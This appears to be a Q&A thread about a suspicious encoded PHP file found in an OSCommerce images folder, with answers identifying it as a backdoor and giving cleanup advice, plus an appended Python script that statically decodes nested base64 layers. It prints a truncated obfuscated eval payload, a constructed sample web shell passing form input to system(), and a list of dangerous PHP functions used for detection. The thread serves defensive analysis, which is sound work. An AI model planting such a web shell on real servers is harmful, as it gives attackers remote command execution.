Brad

Reputation: 1369

Unexpected PHP file showed up in OSCommerce

Was digging through the OSCommerce files on my site and found a file in the /images folder that I don't ever remember seeing before. I haven't checked the original install package, but I suspect this isn't a part of it.

The file is 27 KB and called vidovic_pretty.php. It's encoded or compiled in some way, so the contents are unviewable (see below).

<?eval(base64_decode("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7...

Running it displays a single html textbox and a button that says, "Check."

Anyone have any ideas what it is or what it might do?

Thanks

Upvotes: 1

Views: 350

Answers (5)

Don

Reputation: 4673

In my PHP framework, I do not allow files to be uploaded that apache might know how to execute upon retrieval.

If you must print out a thing like this, do it in a CLI version of PHP, don't send it to your browser! It might also include something that our browser will execute.

Upvotes: 0

code_burgar

Reputation: 12323

Definitely a baddie you got there. As others have pointed out, it most probably serves as a nice backdoor for the attacker to run arbitrary commands on your system.

What you should, at a bare minimum, do is:

  • Notify your tech support and ask for them to find out what the attacker changed and when
  • If you are on a shared host, move to a dedicated server (or at least a VPS)
  • Back up your data, verifying it's clean in the process
  • Roll back to a backup made before the box has been compromised
  • Apply any and all security patches to the software you have been running, the OS, etc.
  • Reinstall your scripts then re-import the clean data

Upvotes: 1

rook

Reputation: 67039

I have absolutely no doubt in my mind that you have been hacked. You have discovered a backdoor and you must remove it immediately. These are often put in place by automated attack systems and then a hacker can come back at a later date and assume control over your server or use your server to break into web browsers that visit it. I have cleaned up hacks identical to this before. I'm surprised you aren't on Google's malware list; that is usually people's first indication.

I really want to find out the PHP code that is being eval'ed. Can you post the full base64? Maybe split it up by newlines so it will fit.

Upvotes: 0

Max Shawabkeh

Reputation: 38643

This is most likely something a hacker injected - encoded and minimized. You can echo the result of base64_decode(...) instead of evaluating it to see what it would try to perform. BTW, actually running it was probably a big mistake.

Upvotes: 4

mr-sk

Reputation: 13417

If you can provide the entire string within the base64_decode - Or, actually, instead of calling eval, call echo:

<?echo base64_decode("JGs9M...");

You'll be able to see what it does. But, typically, this is a signature of a backdoor/attacker, etc. I've seen this style before. And the fact it's in the images/ directory maybe means they were able to get something like photo.gif.php uploaded ...

Probably not good at all.

Running it displays a single html textbox and a button that says, "Check."

Does it post to a page? Maybe the page receives whatever is in the textbox and executes it via system(), exec(), etc.

Upvotes: 2
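Max Shawabkeh and mr-sk both advise decoding the payload instead of eval'ing it. The Python script below is an added example (not from the question or any answer) that does that statically: it unwraps nested base64_decode("...") literals without handing anything to a PHP interpreter and flags command-execution calls in the innermost layer. The sample file contents are constructed here, not the real vidovic_pretty.php; a real sample may carry further obfuscation layers (like the numeric explode() list in the question) that this script does not decode.

```python
import base64
import binascii
import re

# Constructed sample (not the file from the question): two layers of
# eval(base64_decode(...)) wrapped around a form handler that calls system().
INNER_PHP = (
    "<?php echo '<form method=\"post\"><input name=\"c\">"
    "<input type=\"submit\" value=\"Check\"></form>';"
    " if (isset($_POST['c'])) { system($_POST['c']); }"
)
MIDDLE_PHP = 'eval(base64_decode("%s"));' % base64.b64encode(INNER_PHP.encode()).decode()
SAMPLE_FILE = '<?eval(base64_decode("%s"));' % base64.b64encode(MIDDLE_PHP.encode()).decode()

# Matches base64_decode("...") or base64_decode('...') with a literal argument.
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")

# Functions whose presence in a decoded payload deserves a close look.
SUSPICIOUS = ("eval", "system", "exec", "shell_exec", "passthru",
              "popen", "proc_open", "assert", "create_function")

def unwrap_layers(source, max_depth=10):
    """Decode nested base64_decode() literals, outermost first, never executing them."""
    layers = []
    current = source
    for _ in range(max_depth):          # bounded so a malformed file cannot loop forever
        m = B64_CALL.search(current)
        if not m:
            break
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", m.group(2)), validate=True)
        except binascii.Error:          # literal is not valid base64: stop here
            break
        current = raw.decode("utf-8", errors="replace")
        layers.append(current)
    return layers

def suspicious_calls(php):
    """Names from SUSPICIOUS that appear as calls (name followed by '(')."""
    return [fn for fn in SUSPICIOUS if re.search(r"\b%s\s*\(" % fn, php)]

def triage(source):
    """Summarise a file: layer count, innermost decoded code, and flagged calls."""
    layers = unwrap_layers(source)
    final = layers[-1] if layers else source
    return {"layers": len(layers), "final": final, "flags": suspicious_calls(final)}

if __name__ == "__main__":
    print(triage(SAMPLE_FILE))
```

Run it with the CLI interpreter on a copy of the suspect file's text, as Don suggests, rather than through the web server.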
